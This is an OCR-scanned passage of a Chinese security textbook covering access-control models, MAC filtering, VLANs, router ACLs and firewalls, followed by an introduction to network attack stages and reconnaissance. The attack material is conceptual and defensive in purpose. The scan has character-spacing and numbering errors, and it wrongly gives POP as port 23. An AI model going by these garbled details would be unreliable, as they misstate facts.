一 个 工作 流 的 业务 流程 由 多 个 任务 构成 。 而 一 个 任务 对 应 于 一 个 授权 结构 体 ,每 个 授 
权 结 构 体 由 特定 的 授权 步 组 成 。 授 权 结 构 体 之 间 以 及 授权 步 之 间 通 过 依赖 关系 联系 在 一 
起 。 在 TBAC 中 ,一 个 授权 步 的 处 理 可 以 决定 后 续 授权 步 对 处 理 对 象 的 操作 许可 ,上 述 许 
可 和 集合 称 为 激活 许可 和 集 。 执 行者 许可 集 和 激活 许可 和 集 一 起 称 为 授权 步 的 保护 态 。 

TBAC 模型 一 般 用 五 元 组 (S,O,P,L,AS) 来 表示 ,其 中 S 表示 主体 ,O 表示 客体 ,P 表 
示 许 可 ,L 表示 生命 期 (Lifecycle) ,AS 表示 授权 步 。 由 于 任务 都 是 有 时 效 性 的 ,所 以 在 基于 
任务 的 访问 控制 中 ,用 户 对 于 授予 他 的 权限 的 使 用 也 是 有 时 效 性 的 。 因 此 , 若 P 是 授权 步 
AS 所 激活 的 权限 ,那么 工 则 是 授权 步 AS 的 存活 期 限 。 在 授权 步 AS 被 激活 之 前 , 它 的 保护 
态 是 无 效 的 ,其 中 包含 的 许可 不 可 使 用 。 当 授权 步 AS 被 触发 时 , 它 的 委托 执行 者 开始 拥有 执 
行者 许可 集中 的 权限 ,同时 它 的 生命 期 开始 倒计时 。 在 生命 期 期 间 ,五 元 组 (S,O,P,L,AS) 有 
效 。 生 命 期 终止 时 ,五 元 组 (S,O,P,L,AS) 无 效 , 委 托 执行 者 所 拥有 的 权限 被 回收 。 

TBAC 的 访问 政策 及 其 内 部 组 件 关系 一 般 由 系统 管理 员 直 接 配置 。 通 过 授权 步 的 动 
态 权限 管理 ,TBAC 支持 最 小 特权 原则 和 最 小 泄露 原则 ,在 执行 任务 时 只 给 用 户 分 配 所 需 
的 权限 ,未 执行 任务 或 任务 终止 后 用 户 不 再 拥有 所 分 配 的 权限 ; 而 且 在 执行 任务 过 程 中 , 当 
某 一 权限 不 再 使 用 时 ,授权 步 自动 将 该 权限 回收 。 

TBAC 从 工作 流 中 的 任务 角度 建 模 ,可 以 依据 任务 和 任务 状态 的 不 同 ,对 权限 进行 动 
态 管理 。 因 此 ,TBAC 非常 适合 分 布 式 计算 和 多 点 访问 控制 的 信息 处 理 控 制 以 及 在 工作 
流 ,分布 式 处 理 和 事务 管理 系统 中 的 决策 制定 。 


825 基于 对 象 的 访问 控制 


DAC 或 MAC 模型 的 主要 任务 都 是 对 系统 中 的 主体 和 客体 进行 一 维 的 权限 管理 , 当 用 
户 数量 多 、 处 理 的 信息 数据 量 巨大 时 ,用 户 权限 的 管理 任务 将 变 得 十 分 繁重 ,并 且 用 户 权限 
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难以 维护 ,这 就 降低 了 系统 的 安全 性 和 可 靠 性 。 对 于 海量 的 数据 和 差异 较 大 的 数据 类 型 , 需 
要 用 专门 的 系统 和 专门 的 人 员 加 以 处 理 , 如 果 采 用 RBAC 模型 的 话 , 安 全 管理 员 除 了 维护 
用 户 和 角色 的 关联 关系 外 ,还 需要 将 庞大 的 信息 资源 访问 权限 赋予 有 限 个 角色 。 当 信息 资 
源 的 种 类 增加 或 减少 时 ,安全 管理 员 必 须 更 新 所 有 角色 的 访问 权限 设置 。 而 且 , 如 果 受 控 对 
象 的 属性 发 生变 化 ,同时 需要 将 受 控 对 象 不 同属 性 的 数据 分 配给 不 同 的 访问 主体 处 理 时 , 安 
全 管理 员 将 不 得 不 增加 新 的 角色 ,并 且 还 必须 更 新 原来 所 有 角色 的 访问 权限 设置 以 及 访问 
主体 的 角色 分 配 设置 ,这 样 的 访问 控制 需求 变化 往往 是 不 可 预知 的 ,造成 访问 控制 管理 的 难 
度 和 工作 量 巨 大 。 在 这 种 情况 下 ,有 必要 引入 基于 对 象 的 访问 控制 策略 (ObjectBased 
Access Control,OBAC ) 。 

控制 策略 和 控制 规则 是 OBAC 访问 控制 系统 的 核心 所 在 。 在 基于 受 控 对 象 的 访问 控 
制 中 ,将 访问 控制 列表 与 受 控 对 象 或 受 控 对 象 的 属性 相关 联 , 并 将 访问 控制 选项 设计 成 为 用 
户 ,组 或 角色 及 其 对 应 权限 的 集合 ; 同时 允许 对 策略 和 规则 进行 重用 、 继 承 和 派生 操作 。 这 
样 ,不 仅 可 以 对 受 控 对 象 本 身 进 行 访问 控制 ,对 受 控 对 象 的 属性 也 可 以 进行 访问 控制 ,而 且 
派生 对 象 可 以 继承 父 对 象 的 访问 控制 设置 ,这 对 于 信息 量 巨大 、 信 息 内 容 更 新 变化 频繁 的 管 
理 信 息 系统 非常 有 益 ,可 以 减轻 由 于 信息 资源 的 派生 、 演 化 和 重组 等 带 来 的 分 配 、 设 定 角色 
权限 等 的 工作 量 。 

OBAC 从 信息 系统 的 数据 差异 变化 和 用 户 需求 出 发 ,有 效 地 解决 了 信息 数据 量 大 、 数 
据 种 类 繁多 ,数据 更 新 变化 频繁 的 大 型 管理 信息 系统 的 安全 管理 。OBAC 从 受 控 对 象 的 角 
度 出 发 ,将 访问 主体 的 访问 权限 直接 与 受 控 对 象 相 关联 ,一 方面 定义 对 象 的 访问 控制 列表 ， 
增 \、 删 ,修改 访问 控制 项 易于 操作 ; 另 一 方面 , 当 受 控 对 象 的 属性 发 生 改 变 , 或 者 受 控 对 象 发 
生 继 承 和 派生 行为 时 ,无 须 更 新 访问 主体 的 权限 ,只 需要 修改 受 控 对 象 的 相应 访问 控制 项 即 
可 ,从 而 减少 了 访问 主体 的 权限 管理 ,降低 了 授权 数据 管理 的 复杂 性 。 


83 网 络 访问 控制 的 应 用 


目前 进行 网 络 访问 控制 的 方法 主要 有 MAC 地 址 过 滤 、VLAN 隔离 .IEEE802. 1Q 身份 
验证 .基于 IP 地 址 的 访问 控制 列表 和 防火 墙 控制 等 。 


83.1 MAC 地 址 过 滤 


MAC 地 址 是 网 络 设备 在 全 球 的 唯一 编号 , 它 也 就 是 我 们 通常 所 说 的 物理 地 址 、 硬 件 
地 址 .适配器 地 址 或 网 卡 地 址 。MAC 地 址 可 用 于 直接 标识 某 个 网 络 设备 ,是 目前 网 络 数 
据 交换 的 基础 。 现 在 二 层 交 换 机 都 可 以 支持 基于 物理 端口 配置 MAC 地 址 过 滤 表 ,用 于 
限定 只 有 与 MAC 地 址 过 滤 表 中 规定 的 一 些 网 络 设备 有 关 的 数据 包 才 能 够 使 用 该 端口 进 
行 传递 。 通 过 MAC 地 址 过 滤 技 术 可 以 保证 只 有 授权 的 MAC 地 址 才能 对 网 络 资源 进行 
访问 。 

如 图 8-6 所 示 ,在 服务 器 B 所 连接 的 交换 机 网 络 端口 的 MAC 地 址 列表 中 上 只 配置 了 
MAC a 和 MAC 两 个 工作 站 的 MAC 地 址 ,因此 只 有 这 两 台 工作 站 可 以 访问 服务 器 B, 而 
MAC c 就 不 能 访问 了 ,但 是 在 服务 器 A 中 却 没 有 配置 MAC 地 址 表 , 交 换 机 就 默认 可 以 与 
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所 有 同一 网 段 的 工作 站 连接 ,这 样 MAC a、MAC b、MAC c 三 个 工作 站 都 可 以 与 服务 器 A 
连接 了 。 


服务 器 A 服务 器 B 


MACa MACD MACc 
图 8-6 MAC 地 址 过 滤 


由 于 MAC 地 址 过 滤 是 基于 网 络 设备 唯一 ID 的 ,因此 通过 MAC 地 址 过 滤 ,可 以 从 根 
本 上 限制 使 用 网 络 资源 的 使 用 者 。 基 于 MAC 地 址 的 过 滤 对 交换 设备 的 要 求 不 高 ,并 且 基 
本 对 网 络 性 能 没有 影响 ,配置 命令 相对 简单 ,比较 适合 小 型 网 络 ,规模 较 大 的 网 络 不 太 适 用 。 
因为 使 用 MAC 地 址 过 滤 技 术 要 求 网 络 管理 员 必 须 明 确 网 络 中 每 个 网 络 设备 的 MAC 地 
址 ,并 要 根据 控制 要 求 对 各 端口 的 过 滤 表 进 行 配 置 ; 且 当 某 个 网 络 设备 的 网 卡 发 生变 化 ,或 
是 物理 位 置 变 化 时 要 对 系统 进行 重新 配置 ,所 以 采用 MAC 地 址 过 滤 方 法 ,对 于 网 管 员 来 
说 ,其 负担 是 相当 重 的 ,而 且 随 着 网 络 设备 数量 的 不 断 扩 大 , 它 的 维护 工作 量 也 不 断 加 大 。 


8.32 ” VLAN 隔离 


VLAN( 虚 拟 局 域 网 ) 技 术 是 为 了 避免 当 一 个 网 络 系统 中 网 络 设备 数量 增加 到 一 定 程度 
后 ,众多 的 网 络 广播 报 文 消耗 大 量 的 网 络 带宽 ,使 得 真正 的 数据 传递 受到 很 大 的 影响 ,确保 
部 分 安全 性 比较 敏感 的 部 门 数据 不 被 随意 访问 浏览 而 采用 一 种 划分 相互 隔离 子 网 的 方法 。 

通过 VLAN 技术 ,可 以 把 一 个 网 络 系统 中 的 众多 网 络 设备 分 成 若干 个 虚拟 的 “工作 
组 ”, 组 和 组 之 间 的 网 络 设备 在 二 层 上 互相 隔离 ,形成 不 同 的 广播 域 , 进 而 将 广播 流量 限制 在 
不 同 的 广播 域 中 。 

由 于 VLAN 技术 是 基于 二 层 和 三 层 之 间 的 隔离 技术 ,被 广泛 应 用 于 网 络 安全 方面 ,可 
以 通过 将 不 同 的 网 络 用 户 与 网 络 资源 进行 分 组 ,通过 支持 VLAN 的 交换 机 阻隔 不 同 组 内 网 
络 设备 间 的 数据 交换 来 达到 网 络 安全 的 目的 。 该 方式 允许 同一 VLAN 上 的 用 户 互相 通信 ， 
而 处 于 不 同 VLAN 的 用 户 之 间 在 链 路 层 上 是 断 开 的 ,只 能 通过 路 由 器 或 三 层 交 换 机 才能 
访问 。 

如 图 8-7 所 示 ,工作 站 1、2 划分 到 VLANI1 中 ,3、4 划分 到 VLAN2 中 ,这 样 1.2 工作 站 
之 间 可 以 相互 通信 ,3、4 工作 站 之 间 也 可 以 相互 通信 ,但 两 个 组 之 间 不 可 以 直接 通信 ,这 样 
可 以 确保 本 组 资源 只 能 由 本 组 用 户 访问 。 


142 


信息 安全 原理 及 应 


二 层 交 换 机 


图 8-7 利用 VLAN 实现 访问 控制 


目前 基于 VLAN 隔离 方式 的 访问 控制 方法 ,在 一 些 中 小 型 企业 中 也 得 到 广泛 应 用 。 如 
企业 中 的 人 事 部 和 财务 部 等 部 门 都 是 相对 来 说 安全 性 要 求 更 高 一 些 的 ,通常 不 允许 其 他 部 
门 用 户 随意 访问 、 查 阅 相关 资料 。 通 过 VLAN 方式 划分 后 ,两 个 部 门 的 网 络 数据 就 不 会 被 
其 他 用 户 访问 了 ,虽然 他 们 与 其 他 部 门 一 样 同 处 一 个 网 络 。 还 有 一 点 要 注意 的 是 ,虽然 别 的 
用 户 不 能 随意 访问 VLAN 组 用 户 , 但 VLAN 组 用 户 却 可 随意 访问 其 他 非 VLAN 组 用 户 ， 
除非 也 做 了 访问 限制 配置 。 

不 同 的 交换 机 VLAN 划分 的 方法 不 尽 相同 ,可 以 分 别 基 于 端口 .MAC IP 地 址 进行 。 

虽然 VLAN 隔离 方式 具有 比较 明显 的 优点 ,但 同时 也 有 一 个 非常 明显 的 缺点 , 那 就 是 
要 求 网 络 管理 员 必 须 明 确 交 换 机 每 一 物理 端口 上 所 连接 的 设备 的 MAC 地 址 或 是 IP 地 址 ， 
并 要 根据 不 同 的 工作 组 对 交换 机 进行 VLAN 配置 。 当 某 一 网 络 终端 的 网 卡 、IP 地 址 或 是 
物理 位 置 发 生变 化 时 ,需要 对 整个 网 络 系统 中 的 多 个 相关 的 网 络 设备 进行 重新 配置 ,这 同样 
对 于 网 管 员 来 说 负担 是 相当 重 的 ,所 以 只 适用 于 在 小 型 网 络 中 使 用 。 

在 安全 性 方面 也 存在 隐患 ,VLAN 技术 可 以 保证 网 络 设 备 间 的 隔离 ,但 对 于 同一 台 服 
务 器 ,只 能 做 到 同时 向 多 个 VLAN 组 全 面 开放 或 是 只 向 某 个 VLAN 组 全 面 开放 ,而 不 能 针 
对 个 别 用 户 进行 限制 。 而 在 通常 情况 下 ,一 台 服 务 器 会 提供 多 种 服务 ,担当 多 种 服务 器 角 
色 , 同 时 为 多 个 VLAN 组 用 户 提 供 不 同 的 服务 ,这 样 带 来 了 一 定 的 安全 隐患 。 例 如 一 个 数 
据 库 服务 器 中 可 能 存 有 财务 数据 ,也 可 能 同时 担当 市 场 部 电子 商务 中 服务 器 角色 , 存 有 客户 
的 数据 ,这 样 这 台 服 务 器 就 得 同时 向 财务 人 员 与 市 场 人 员 开 放 , 单 纯 采 用 VLAN 技术 就 无 
法 避免 市 场 人 员 查 看 财务 数据 的 情况 发 生 。 当 然 这 种 安全 隐患 可 通过 其 他 途径 来 解决 。 


833 ACL 访 问 控制 列表 


访问 控制 列表 在 路 由 器 中 被 广泛 采用 ,. 它 是 一 种 基于 包 过 滤 的 流向 控制 技术 。 标 准 访 
问 控制 列表 通过 把 源 地 址 .目的 地 址 以 及 端口 号 作为 数据 包 检查 的 基本 元 素 , 并 可 以 规定 符 
合 检查 条 件 的 数据 包 是 允许 通过 ,还 是 不 允许 通过 。 访 问 控制 列表 通常 应 用 在 企业 网 络 的 
出 口 控制 上 ,例如 企业 通过 实施 访问 控制 列表 ,可 以 有 效 地 部 署 企业 网 络 出 网 策略 ,如 控制 
哪些 员工 可 以 访问 Internet; 员工 可 以 访问 哪些 Internet 站 点 ; 员工 可 以 在 什么 时 候 访 问 
Internet; 员工 可 以 利用 Internet 收发 电子 邮件 而 不 可 以 进行 视频 聊天 活动 等 。 随 着 局 域 
网 内 部 网 络 资源 的 增加 ,一 些 企业 已 经 开始 使 用 访问 控制 列表 来 控制 对 局 域 网 内 部 资源 的 
访问 能 力 ,进而 来 保障 这 些 资源 的 安全 性 。 


第 8 章 ”访问 控制 


如 图 8-8 所 示 的 就 是 一 个 应 用 ACL 访问 控制 列表 的 示意 图 。 在 路 由 器 A 中 配置 一 个 
访问 控制 列表 ,ACL 访问 控制 列表 配置 允许 IP 地 址 为 192. 168. 2. 10 的 工作 站 通过 路 由 器 
访问 其 他 网 络 IP 地 址 为 192. 168. 5. 2 的 主机 ,而 子 网 192. 168. 1. 0 不 能 与 192. 168. 2. 10 
及 192. 168.5.2 通 信 。 


92.168.2.10 


ACL for RouterA 

192.168.1.0 
192.168.2.10 deny 
192.168.5.2 deny 
0.0.0.0 permit 

192.168.2.0 
192.168.5.2 deny 
0.0.0.0 deny 


192.168.5,1 192.168.5.2 
图 8-8 路 由 器 的 访问 控制 列表 示例 


访问 控制 列表 可 以 有 效 地 在 网 络 层 上 控制 网 络 用 户 对 网 络 资源 的 访问 , 它 既 可 以 细致 
到 两 台 网 络 设备 间 的 具体 的 网 络 应 用 ,也 可 以 按 网 段 进行 大 范围 的 访问 控制 管理 ,为 网 络 应 
用 提供 了 一 个 有 效 的 安全 手段 。 

采用 访问 控制 列表 技术 ,网 络 管理 员 需 要 明确 每 一 台 主 机 及 工作 站 所 在 的 IP 子 网 ,并 
确认 它们 之 间 的 访问 关系 ,对 于 网 络 终端 数量 有 限 的 网 络 而 言 , 这 是 可 行 的 ,但 对 于 具有 大 
量 网 络 终端 的 网 络 而 言 ,为 了 完成 某 些 访问 控制 甚至 不 得 不 浪费 很 多 的 IP 地 址 资源 ,同时 
巨大 的 网 络 终端 数量 ,同样 会 使 得 管理 的 复杂 性 和 难度 十 分 巨大 。 

另外 ,维护 访问 控制 列表 不 仅 耗 时 ,而 且 较 大 程度 上 增加 了 路 由 器 开销 。 访 问 控制 列表 
的 策略 性 非常 强 , 并 且 与 网 络 的 整体 规划 有 很 大 的 关系 ,因此 , 它 的 使 用 对 策略 制定 及 网 络 
规划 的 人 员 要 求 比较 高 ,所 以 是 否 采用 访问 控制 列表 以 及 在 多 大 程度 上 利用 它 , 只 能 是 管理 
效益 与 网 络 安全 之 间 的 一 个 权衡 。 


834 防火 墙 访问 控制 


防火 墙 技术 首先 将 网 络 划分 为 内 网 与 外 网 , 它 通 过 分 析 每 一 项 内 网 与 外 网 通信 应 用 的 
协议 构成 ,得 出 主机 IP 地 址 及 端口 号 ,从 而 规划 出 业务 流 , 对 相应 的 业务 流 进 行 控制 。 如 
图 8-9 所 示 的 是 一 个 利用 防火 墙 控制 内 、 外 网 络 通信 的 基本 网 络 结构 。 

通过 对 防火 墙 的 配置 可 以 对 外 界 开放 Web 服务 器 的 80 端口 ,因为 80 号 端口 是 Web 
应 用 的 HTTP 协议 使 用 的 端口 ,这 样 就 可 使 得 任何 用 户 都 可 以 访问 公司 的 网 站 。 而 在 邮件 
服务 器 及 DNS 服务 器 上 也 开放 相应 的 端口 (如 POP 的 23 号 端口 和 SMTP 的 25 号 端口 )， 
在 保证 相应 功能 实现 的 同时 ,也 确保 这 些 主机 不 会 受到 恶意 的 攻击 。 而 对 于 数据 库 服务 器 
来 说 ,外 界 对 它 的 访问 将 受到 严格 的 限制 ,多 是 以 VPN 或 是 加 密 传输 的 专线 方式 进行 。 

防火 墙 技术 在 最 大 限度 上 限制 了 源 IP 地 址 、 目 的 IP 地 址 、 源 端口 号 、 目 的 端口 号 的 访 
问 权 限 ,从 而 限制 了 每 一 业务 流 的 通 断 。 它 要 求 网 络 管理 员 明 确 每 一 业务 的 源 及 目标 地 址 、 
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Web 服 务 器 邮件 服务 器 DNS 服务 器 数据 库 服务 器 
图 8-9 应 用 防火 墙 实现 访问 控制 


以 及 该 业务 的 协议 甚至 端口 。 在 一 个 庞大 的 网 络 中 构造 一 个 有 效 的 防火 墙 , 也 需要 相当 大 
的 工作 量 与 技术 水 平 。 同 时 ,防火 墙 设备 如 果 要 达到 很 高 的 数据 吞吐 量 , 其 设备 造价 将 会 非 
常 高 ,通常 在 企业 应 用 中 都 只 能 用 于 整个 企业 的 出 口 安全 ,在 企业 网 内 部 的 安全 保护 方面 使 
用 较 少 。 

支持 VPN 通信 的 防火 墙 支持 如 DES、3DES、RC4 以 及 国内 专用 的 数据 加 密 标准 和 算 
法 。 加 密 除 用 于 保护 传输 数据 以 外 ,还 应 用 于 其 他 领域 ,如 身份 认证 , 报 文 完整 性 认证 , 密 钥 
分 配 等 。 支 持 的 用 户 身份 认证 类 型 是 指 防火 墙 支 持 的 身份 认证 协议 ,一 般 情况 下 具有 一 个 
或 多 个 认证 方案 ,如 RADIUS、Kerberos、TACACS/TACACS 十 、 口令 方式 .数字 证 书 等 。 
防火 墙 能 够 为 本 地 或 远程 用 户 提供 经 过 认证 与 授权 的 对 网 络 资源 的 访问 ,防火 墙 管 理 员 必 
须 决定 客户 以 何 种 方式 通过 认证 。 

还 可 对 通过 防火 墙 的 包 过 滤 规 则 进行 设置 。 包 过 滤 防 火 墙 的 过 滤 规则 集 由 若干 条 规则 
组 成 , 它 应 涵盖 对 所 有 出 入 防火 墙 的 数据 包 的 处 理 方法 。 对 于 没有 明确 定义 的 数据 包 , 应 该 
有 一 个 默认 处 理 方法 ; 过 滤 规 则 应 易于 理解 ,易于 编辑 修改 ; 同时 应 具备 一 致 性 检测 机 制 ， 
防止 冲突 。 

防火 墙 中 的 IP 包 过 滤 依 据 主要 是 IP 包头 部 信息 ,如 源 地 址 和 目的 地 址 。 如 IP 头 中 的 
协议 字段 封装 协议 为 ICMP、TCP 或 UDP, 则 再 根据 ICMP 头 信息 (类 型 和 代码 值 ) TCP 头 
信息 ( 源 端口 和 目的 端口 ) 或 UDP 头 信息 ( 源 端口 和 目的 端口 ) 执 行 过 滤 , 其 他 的 还 有 MAC 
地 址 过 滤 。 应 用 层 协 议 过 滤 要 求 主要 包括 FTP 过 滤 、 基 于 RPC 的 应 用 服务 过 滤 、 基 于 
UDP 的 应 用 服务 过 滤 要 求 以 及 动态 包 过 滤 技术 等 。 

以 上 几 种 访问 控制 方式 各 有 优 缺 点 ,由 于 它们 采用 的 技术 以 及 所 要 解决 问题 的 方向 相 
差 较 大 ,所 以 在 现实 的 网 络 安全 管理 中 ,通常 都 是 几 种 甚至 是 全 部 技术 的 组 合 。 


网 络 攻击 技术 


网 络 攻击 技术 是 一 把 双 刃 剑 。 对 攻击 者 而 言 , 它 是 攻击 技术 ,对 安全 人 员 来 说 , 它 是 不 
可 缺少 的 安全 防护 技术 。 

网 络 的 攻击 和 和 侵 都 是 指 通过 非 授权 的 行为 对 网 络 和 系统 造成 某 种 形式 的 危害 。 其 中 
攻击 倾向 于 对 网 络 或 者 系统 造成 破坏 ,例如 拒绝 服务 攻击 ,让 服务 器 无 法 提供 服务 甚至 网 络 
瘫痪 ; 而 人 侵 倾 向 于 获取 某 些 信息 而 不 对 系统 造成 破坏 ,例如 获取 系统 的 控制 权力 。 

实际 上 现在 对 这 两 个 词 的 使 用 比较 混乱 ,并 没有 明显 区 分 。 在 本 书 除非 专门 说 明 ,并 没 
有 刻意 区 分 两 个 词 。 

对 系统 的 攻击 和 入 侵 , 都 是 利用 软件 或 系统 漏洞 进行 的 。 换 句 话说 ,如 果 一 个 系统 完美 
无 缺 ,并 且 在 此 系统 上 安装 的 所 有 软件 也 是 完美 的 ,同时 对 它们 的 管理 也 无 懈 可 击 。 那 么 ， 
就 不 存在 入 侵 和 攻击 行为 了 。 

但 是 ,这 种 情况 是 不 存在 的 ,从 前 不 存在 ,今后 也 不 可 能 存在 ,甚至 更 糟糕 。 这 是 由 人 们 
认识 世界 和 改造 世界 的 能 力 缺 陷 所 注定 的 。 人 们 设计 的 软 硬 件 产品 是 不 可 能 不 留 下 任何 缺 
陷 和 漏洞 的 。 从 这 个 意义 上 讲 ,信息 安 全 问题 永远 都 不 可 能 得 到 根本 的 解决 ,信息 系统 始终 
都 处 于 开放 和 安全 的 矛盾 之 中 。 然 而 ,从 哲学 的 观点 来 看 , 正 是 矛盾 , 才 是 发 展 的 根本 动力 。 

比如 ,今天 的 软件 系统 一 般 非 常 复杂 , 越 复杂 ,就 越 难 预测 它 在 各 种 可 能 场景 下 的 反应 
方式 ,也 就 越 难 保证 其 安全 性 。 

当今 操作 系统 应 用 程序 的 代码 行 数 越 来 越 多 。Windows XP 大 概 有 4000 万 行 代码 ， 
Windows 2000 有 2900 万 行 代码 ; UNIX 和 Linux 少 一 些 ,通常 在 200 万 行 代 码 左 右 。 业 
界 通常 有 这 样 一 个 估算 方式 , 即 每 1000 行 代 码 中 大 约 有 5 一 50 个 bug。 因 此 ,从 平均 意义 
上 估计 ,Windows XP 中 大 约 有 120 万 个 bug。 

试图 从 逻辑 上 理解 1700 万 一 4000 万 行 代码 并 增强 其 安全 性 ,难度 是 非常 大 的 。 如 果 
进一步 分 析 , 不 同 的 操作 系统 协议 栈 中 集成 了 数 以 千 计 的 协议 ,即使 这 些 协 议 中 存在 安全 漏 
洞 ,操作 系统 和 应 用 程序 也 必须 依赖 这 些 协 议 在 不 同 的 系统 和 应 用 程序 间 传 输 数据 ,这 必然 
造成 安全 隐患 。 另 外 ,设备 驱动 程序 由 不 同 厂商 开发 并 安装 到 操作 系统 中 ,在 许多 情况 下 ， 
这 些 驱动 开发 得 并 不 完美 ,并 对 操作 系统 的 稳定 性 造成 了 影响 。 由 于 这 部 分 的 软件 更 加 接 
近 于 硬件 ,向 固件 注入 恶意 代码 ,已 经 成 为 了 一 种 流行 的 攻击 手段 。 

大 多 数 情况 下 ,恶意 攻击 者 使 用 的 工具 和 安全 技术 人 员 是 相同 的 ,这 意味 着 安全 人 员 必 
须 了 解 攻 击 者 使 用 的 工具 和 手段 ,知道 新 出 现 的 攻击 方式 ,不 断 更 新 自己 的 知识 和 技能 , 甚 
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至 要 懂得 更 多 ,因为 安全 人 员 必 须 识别 并 解决 某 一 环境 中 存在 的 所 有 漏洞 ,而 攻击 者 只 需要 
精通 一 到 两 种 攻击 方法 即 可 实施 攻击 。 
表 9-1 列 出 了 进行 一 次 完整 的 网 络 攻击 所 遵循 的 基本 步骤 。 


表 9-1 基本 的 网 络 攻击 步骤 


攻击 的 步骤 解 释 例 和 
侦查 被 动 或 者 主动 获取 信息 的 过 程 。 嗅 探 网 络 流量 ,查看 HTML 代码 ,社交 工程 , 获 
取 目 标 系 统 的 一 切 信息 
扫描 及 漏洞 分 析 识别 所 运行 系统 和 系统 上 活动 ”Ping 扫描 ,端口 扫描 漏洞 扫描 
的 服务 ,从 中 找 出 可 攻击 的 弱点 
获取 访问 权限 攻击 识别 的 漏洞 ,以 获取 未 授权 “利用 缓冲 区 溢出 或 者 暴力 破解 口令 ,并 登录 


的 访问 权限 系统 
保持 访问 权限 上 传 恶意 软件 ,以 确保 能 重新 进 ”在 系统 上 安装 后 门 
人 系统 
消除 痕迹 消除 恶意 活动 的 踪迹 删除 或 修改 系统 和 应 用 日 志 中 的 数据 


本 章 通过 分 析 攻 击 的 几 个 步骤 ,描述 攻击 的 基本 过 程 和 防范 方式 。 

需要 说 明 的 是 ,在 这 一 章 中 用 到 了 几 个 词 : 黑客 .安全 人 员 、 和 侵 者 攻击 者 。 这 几 个 词 
所 代表 的 群体 有 相似 之 处 也 有 不 同 之 处 。 

黑客 (hacker) 指 的 是 一 个 对 编程 语言 ( 某 领域 内 的 ) 有 足够 了 解 ,可 以 不 经 长 时 间 思 考 
就 能 创造 出 有 用 的 软件 的 人 。 在 本 章 中 ,黑客 单纯 指 试图 破解 或 破坏 某 个 程序 ,系统 及 网 络 
安全 的 人 ,可 能 为 恶意 ,也 可 能 为 善意 。 

安全 人 员 ,在 这 里 指 的 是 对 计算 机 或 者 整个 网 络 进行 管理 ,并 且 从 中 分 析出 安全 事件 的 
人 。 实 际 上 ,很 多 安全 从 业 人 员 曾 经 都 是 黑客 。 

入 侵 者 和 攻击 者 这 两 个 词 含义 类 似 , 但 和 人 侵 者 更 加 侧重 于 偷偷 潜入 系统 ,而 攻击 者 的 含 
义 更 加 倾向 于 破坏 系统 。 本 章 也 没有 刻意 区 分 这 两 类 人 。 

另外 需要 注意 的 是 某 个 系统 是 安全 的 并 不 代表 这 个 系统 可 以 抵御 任何 攻击 行为 , 即 不 
存在 攻 不 破 的 堡垒 。 在 网 络 安全 中 , 某 个 系统 只 要 让 入 侵 者 和 人 侵 系 统 时 所 付出 的 代价 大 于 
他 所 获得 的 利益 ,就 可 以 认为 这 个 系统 是 安全 的 。 


91 侦查 

侦查 也 被 称 为 踩点 , 它 的 目的 是 发 现 目标 ,是 攻击 过 程 中 很 重要 的 一 部 分 。 在 没有 更 多 
信息 或 者 确切 目标 的 情况 下 , 则 需要 尽 可 能 多 地 发 现 目标 。 

黑客 通常 都 是 通过 对 某 个 目标 进行 有 计划 、 有 步骤 的 踩点 ,收集 和 整理 出 一 份 目标 站 点 
信息 安全 现状 的 完整 剖析 图 ,结合 工具 的 配合 使 用 ,来 完成 对 整个 目标 的 详细 分 析 , 找 出 可 
下 手 的 地 方 。 

通过 踩点 主要 收集 以 下 可 用 信息 : 

(1) 网 络 域名 : 域名 系统 (Domain Name System,DNS) 、 网 络 地 址 范围 关键 系统 (如 重 
要 服务 器 、 网 关 等 ) 的 具体 位 置 。 
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(2) 内 部 网 络 : 跟 外 网 比较 相似 ,但 是 进入 内 网 以 后 主要 是 靠 工具 和 扫描 来 完成 

(3) 外 部 网 络 : 目标 站 点 的 一 些 社会 信息 ,包括 企业 的 内 部 专用 网 ,一 般 以 vpn. 
objectsite. com 或 objectsite. com/vpn ,办 公 网 oa. objectsite. com 或 objectsite. comyoa 为 基 
本 形式 。 这 些 都 是 可 以 获得 目标 站 点 信息 的 主要 途径 。 通 过 搜索 引擎 (google、 baidu、 
sohu、yahoo 等 ) 来 获得 企业 的 合作 伙伴 、 分 支 机 构 等 其 他 公开 资料 ,以 及 目标 站 点 里 面 的 用 
户 邮 件 列表 、 即 时 消息 、 新 闻 消息 、 员 工 的 个 人 资料 。 

以 上 这 些 都 是 入侵 所 必需 的 重要 信息 ,也 是 第 一 步 。 另 外 ,还 需要 获取 目标 所 用 的 操作 
系统 ,共有 两 种 类 型 的 操作 系统 踩点 : 被 动 操作 系统 踩点 和 主动 操作 系统 踩点 。 

被 动 操作 系统 踩点 主要 是 通过 嗅 探 网 络 上 的 数据 包 来 确定 发 送 数据 包 的 操作 系统 或 者 
可 能 接收 到 的 数据 包 的 操作 系统 ,其 优点 是 用 被 动 踩点 攻击 或 嗅 探 主 机 时 ,并 不 产生 附加 的 
数据 包 , 主 要 是 监听 并 分 析 ,一 般 操作 是 先 攻 陷 一 台 薄 弱 的 主机 ,在 本 地 网 段 内 嗅 探 数据 包 ， 
以 识别 被 攻陷 主机 能 够 接触 到 的 机 器 操作 系统 的 类 型 。 

主动 操作 系统 识别 是 主动 产生 针对 目标 机 器 的 数据 包 进 行 分 析 和 回复 。 其 缺点 是 很 容 
易 惊动 目标 ,把 人 侵 者 暴露 给 入 侵 检测 系统 。 

操作 系统 的 识别 是 一 个 非常 重要 的 过 程 ,通过 端口 搜索 检查 开放 的 端口 。 一 些 操 作 系 
统 默 认 情 况 下 监听 的 端口 与 其 他 操作 系统 不 同 , 因 此 如 果 搜 索 到 某 个 端口 ,那么 可 以 假定 相 
应 的 目标 机 器 在 运行 相对 应 的 某 个 操作 系统 。 为 了 对 付 这 种 方法 ,安全 人 员 可 以 通过 经 常 
改动 端口 以 增强 系统 的 安全 性 。 

另 一 个 方法 是 向 一 个 监听 服务 发 送 一 些 数据 ,并 预计 可 能 返回 的 可 识别 的 回应 和 错误 。 
某 些 操作 系统 可 能 会 发 送 一 个 可 唯一 识别 的 错误 代码 ,或 者 由 于 没有 严格 遵守 标准 以 至 于 
可 以 识别 。 还 有 一 个 方法 是 考察 TCP 协议 信息 , 某 些 操作 系统 使 用 了 不 同 的 默认 TCP 参 
数 ,各 种 不 同 的 TCP 标志 /数据 包头 的 组 合 会 以 特定 的 方式 进行 响应 。 有 时 候 ,ICMP 回应 
信息 也 被 用 来 尝试 识别 特定 的 操作 系统 。 

